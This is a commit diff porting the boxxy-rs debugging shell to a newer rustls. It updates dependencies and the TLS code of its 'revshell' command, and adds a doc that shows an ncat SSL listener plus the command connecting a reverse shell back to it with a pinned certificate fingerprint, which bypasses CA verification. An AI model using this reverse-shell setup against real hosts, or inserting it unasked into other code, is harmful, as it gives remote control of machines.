Port rustls to latest version

Author: kpcyrd

Cargo.toml

@@ -23,7 +23,7 @@ default = ["readline"]
 full = ["readline", "network", "archives"]
 readline = ["rustyline"]
 network = ["reqwest", "tokio", "futures-util",
-           "rustls", "sha2", "webpki"]
+           "rustls", "sha2"]
 archives = ["tar", "libflate"]
 
 [dependencies]
@@ -33,7 +33,7 @@ structopt = "0.3"
 libc = "0.2"
 errno = "0.2"
 regex = "1.0"
-nix = "0.22"
+nix = "0.23"
 base64 = "0.13"
 anyhow = "1"
 bufstream = "0.1"
@@ -44,9 +44,8 @@ tar = { version = "0.4", optional = true }
 libflate = { version = "1", optional = true }
 
 # network: revshell
-rustls = { version = "0.16", features = ["dangerous_configuration"], optional = true }
+rustls = { version = "0.20", features = ["dangerous_configuration"], optional = true }
 sha2 = { version = "0.9", optional = true }
-webpki = { version = "0.21", optional = true }
 
 # network: curl
 reqwest = { version = "0.11", default-features=false, features=["stream", "rustls-tls-webpki-roots"], optional = true }
@@ -69,5 +68,6 @@ pledge = "0.4"
 env_logger = "0.9"
 elf = "0.0.10"
 ctrlc = "3.1.0"
-rustls = "0.16"
+rustls = "0.20"
 sha2 = "0.9"
+pem = "1.0.1"

docs/tls-revshell.md

@@ -0,0 +1,64 @@
+### Note: this is currently broken :/
+
+There (used) to be a feature to securely back-connect to a remote listener with
+tls. Instead of using the CA trust store the `revshell` command expects the
+certificates fingerprint to be passed as argument.
+
+Generate a tls key for the listener (none of these fields matter):
+
+```
+$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout tls.key -out tls.crt
+Generating a RSA private key
+....+++++
+..........+++++
+writing new private key to 'tls.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [AU]:.
+State or Province Name (full name) [Some-State]:.
+Locality Name (eg, city) []:.
+Organization Name (eg, company) [Internet Widgits Pty Ltd]:.
+Organizational Unit Name (eg, section) []:.
+Common Name (e.g. server FQDN or YOUR name) []:example.com
+Email Address []:.
+$
+```
+
+Calculate the fingerprint of the newly generated certificate:
+
+```
+cargo run --example fingerprint tls.crt
+```
+
+Run the listener:
+
+```
+ncat -lvnp 1337 --ssl --ssl-cert tls.crt --ssl-key tls.key
+```
+
+Compile boxxy with the network features:
+
+```
+$ cargo run --all-features --example boxxy
+   Compiling boxxy v0.12.1 (/home/user/repos/kpcyrd/boxxy-rs)
+    Finished dev [unoptimized + debuginfo] target(s) in 16.93s
+     Running `target/debug/examples/boxxy`
+ [%]> revshell 127.0.0.1:1337 SHA256-FytW1slP5zTMKIq7814yrWRbZqAypnjmgo3jl0CQTzI
+[*] connecting to 127.0.0.1:1337...
+[+] connected!
+[+] established encrypted connection
+[*] see you on the other side...
+```
+
+This currently crashes with:
+
+```
+thread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: InvalidLastSymbol(42, 105)', src/crypto.rs:29:91
+note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
+```

examples/fingerprint.rs

@@ -1,30 +1,32 @@
-extern crate rustls;
-extern crate sha2;
-extern crate base64;
+use anyhow::{Context, Result};
+use sha2::{Sha256, Digest};
+use std::fs;
+use std::path::PathBuf;
+use structopt::{StructOpt, clap::AppSettings};
 
-use std::env;
-use std::fs::File;
-use std::io::BufReader;
+#[derive(Debug, StructOpt)]
+#[structopt(global_settings = &[AppSettings::ColoredHelp])]
+pub struct Args {
+    path: PathBuf,
+}
 
-use sha2::{Sha256, Digest};
-use rustls::internal::pemfile;
+fn main() -> Result<()> {
+    let args = Args::from_args();
 
+    let buf = fs::read(&args.path)
+        .context("Failed to read certificate file")?;
 
-fn main() {
-    let path = env::args().collect::<Vec<String>>().remove(1);
+    let cert = pem::parse(&buf)
+        .context("Failed to parse certificate as pem")?;
 
-    let f = File::open(&path).unwrap();
-    let mut reader = BufReader::new(f);
-    let certs = pemfile::certs(&mut reader).unwrap();
+    let fingerprint = {
+        let mut h = Sha256::new();
+        h.update(&cert.contents);
+        h.finalize()
+    };
 
-    for cert in certs {
-        let fingerprint = {
-            let mut h = Sha256::new();
-            h.update(&cert.0);
-            h.finalize()
-        };
+    let fingerprint = base64::encode_config(&fingerprint, base64::URL_SAFE_NO_PAD);
+    println!("SHA256-{}", fingerprint);
 
-        let fingerprint = base64::encode_config(&fingerprint, base64::URL_SAFE_NO_PAD);
-        println!("SHA256-{}", fingerprint);
-    }
+    Ok(())
 }

src/busybox/network/revshell.rs

@@ -4,10 +4,10 @@ use crate::{Shell, Arguments};
 use crate::ctrl::Interface;
 use crate::crypto::{self, OwnedTlsStream};
 use crate::errors::*;
-use rustls::{ClientSession, ClientConfig};
+use rustls::{ClientConnection, ClientConfig, RootCertStore, ServerName};
+use std::convert::TryFrom;
 use std::sync::Arc;
 use std::net::{TcpStream, SocketAddr};
-use webpki::DNSNameRef;
 
 pub fn revshell(sh: &mut Shell, args: Arguments) -> Result<()> {
     let matches = App::new("revshell")
@@ -32,14 +32,15 @@ pub fn revshell(sh: &mut Shell, args: Arguments) -> Result<()> {
     let fingerprint = matches.value_of("fingerprint").unwrap();
     let run_loop = matches.occurrences_of("loop") > 0;
 
-    let mut config = ClientConfig::new();
+    let mut config = ClientConfig::builder()
+        .with_safe_defaults()
+        .with_root_certificates(RootCertStore::empty())
+        .with_no_client_auth();
     config.dangerous().set_certificate_verifier(Arc::new(crypto::danger::PinnedCertificateVerification {}));
 
-    let fingerprint = match DNSNameRef::try_from_ascii_str(fingerprint) {
-        Ok(fingerprint) => fingerprint,
-        Err(_) => bail!("fingerprint couldn't be converted to DNSNameRef"),
-    };
-    let sess = ClientSession::new(&Arc::new(config), fingerprint);
+    let fingerprint = ServerName::try_from(fingerprint)
+            .map_err(|_| anyhow!("fingerprint couldn't be converted to ServerName"))?;
+    let sess = ClientConnection::new(Arc::new(config), fingerprint)?;
 
     shprintln!(sh, "[*] connecting to {}...", addr);
     let sock = TcpStream::connect(&addr)?;

src/crypto.rs

@@ -1,17 +1,24 @@
-use rustls::{Session, ClientSession};
-
-use std::io;
+use rustls::ClientConnection;
 use std::io::prelude::*;
+use std::io;
 use std::net::TcpStream;
 
-
 pub mod danger {
     use crate::errors::*;
+    use rustls::{Certificate, ServerName};
+    use rustls::client::ServerCertVerified;
     use sha2::{Sha256, Digest};
+    use std::time::SystemTime;
 
     pub struct PinnedCertificateVerification {}
 
-    fn verify_fingerprint(trusted: &str, cert: &rustls::Certificate) -> Result<(), Error> {
+    fn verify_fingerprint(trusted: &ServerName, cert: &rustls::Certificate) -> Result<(), Error> {
+        let trusted = if let ServerName::DnsName(name) = trusted {
+            name.as_ref()
+        } else {
+            bail!("unsupported server name")
+        };
+
         let idx = match trusted.find('-') {
             Some(idx) => idx,
             None => bail!("malformed fingerprint"),
@@ -37,34 +44,34 @@ pub mod danger {
         }
     }
 
-    impl rustls::ServerCertVerifier for PinnedCertificateVerification {
-
-        fn verify_server_cert(&self,
-                              _roots: &rustls::RootCertStore,
-                              presented_certs: &[rustls::Certificate],
-                              dns_name: webpki::DNSNameRef,
-                              _ocsp: &[u8]) -> Result<rustls::ServerCertVerified, rustls::TLSError> {
-
-            for cert in presented_certs {
-                if verify_fingerprint(dns_name.into(), &cert).is_ok() {
-                    return Ok(rustls::ServerCertVerified::assertion());
-                }
+    impl rustls::client::ServerCertVerifier for PinnedCertificateVerification {
+        fn verify_server_cert(
+            &self,
+            end_entity: &Certificate,
+            _intermediates: &[Certificate],
+            server_name: &ServerName,
+            _scts: &mut dyn Iterator<Item = &[u8]>,
+            _ocsp_response: &[u8],
+            _now: SystemTime
+        ) -> Result<ServerCertVerified, rustls::Error> {
+            if verify_fingerprint(server_name, &end_entity).is_ok() {
+                Ok(ServerCertVerified::assertion())
+            } else {
+                Err(rustls::Error::General("Untrusted certificate".to_string()))
             }
-
-            Err(rustls::TLSError::WebPKIError(webpki::Error::CertNotValidForName))
         }
     }
 }
 
 
 #[derive(Debug)]
 pub struct OwnedTlsStream {
-    pub sess: rustls::ClientSession,
+    pub sess: rustls::ClientConnection,
     pub sock: TcpStream,
 }
 
 impl OwnedTlsStream {
-    pub fn new(sess: ClientSession, sock: TcpStream) -> OwnedTlsStream {
+    pub fn new(sess: ClientConnection, sock: TcpStream) -> OwnedTlsStream {
         OwnedTlsStream { sess, sock }
     }
 
@@ -89,23 +96,23 @@ impl Read for OwnedTlsStream {
             self.sess.complete_io(&mut self.sock)?;
         }
 
-        self.sess.read(buf)
+        self.sess.reader().read(buf)
     }
 }
 
 impl Write for OwnedTlsStream {
     fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
         self.complete_prior_io()?;
 
-        let len = self.sess.write(buf)?;
+        let len = self.sess.writer().write(buf)?;
         self.sess.complete_io(&mut self.sock)?;
         Ok(len)
     }
 
     fn flush(&mut self) -> io::Result<()> {
         self.complete_prior_io()?;
 
-        self.sess.flush()?;
+        self.sess.writer().flush()?;
         if self.sess.wants_write() {
             self.sess.complete_io(&mut self.sock)?;
         }